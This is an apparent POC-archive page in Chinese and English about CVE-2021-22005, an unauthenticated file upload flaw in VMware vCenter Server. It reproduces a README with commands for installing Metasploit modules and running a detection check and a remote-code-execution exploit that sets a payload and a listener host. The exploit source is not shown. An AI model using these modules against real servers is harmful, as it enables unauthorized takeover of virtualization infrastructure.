关联漏洞
标题:Vmware VMware vCenter Server 路径遍历漏洞 (CVE-2021-22005)Description:VMware vCenter Server是美国威睿(VMware)公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台,可自动实施和交付虚拟基础架构。 VMware vCenter Server 存在路径遍历漏洞,该漏洞源于在Analytics服务中上传文件时文件验证不足导致。未经身份验证的攻击者可以通过网络访问443端口,在目标系统上传和执行任意文件。
介绍
# CVE-2021-22005-metasploit
the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability
# preparation POC
```cmd
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp vmware_vcenter_server_file_upload_poc.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/vmware_vcenter_server_file_upload_poc.py
msfconsole
```
# POC usage
```text
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: true for https>
exploit
```
# result
the script will upload a harmless jsp which include "Could be vuln by CVE-2021-22005" text encoded by base64
# preparation EXP
```cmd
git clone https://github.com/TaroballzChen/CVE-2021-22005-metasploit
cd CVE-2021-22005-metasploit
mkdir -p ~/.msf4/modules/exploits/linux/http
cp vmware_vcenter_server_file_upload_to_rce.py ~/.msf4/modules/exploits/linux/http/
chmod +x ~/.msf4/modules/exploits/linux/http/vmware_vcenter_server_file_upload_to_rce.py
msfconsole
```
# exploit usage
```text
set target <target>
set PAYLOAD <payload>
set rhost <vuln ip>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>
exploit
```
# exploit
# reference
- <https://github.com/5gstudent/CVE-2021-22005->
- <https://github.com/rwincey/CVE-2021-22005>
文件快照
[4.0K] /data/pocs/071fab83bb2642f525a7f9cbc1869fd620e35a87
├── [3.5M] exp.png
├── [4.2M] poc.png
├── [1.4K] README.md
├── [7.1K] vmware_vcenter_server_file_upload_poc.py
└── [8.5K] vmware_vcenter_server_file_upload_to_rce.py
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。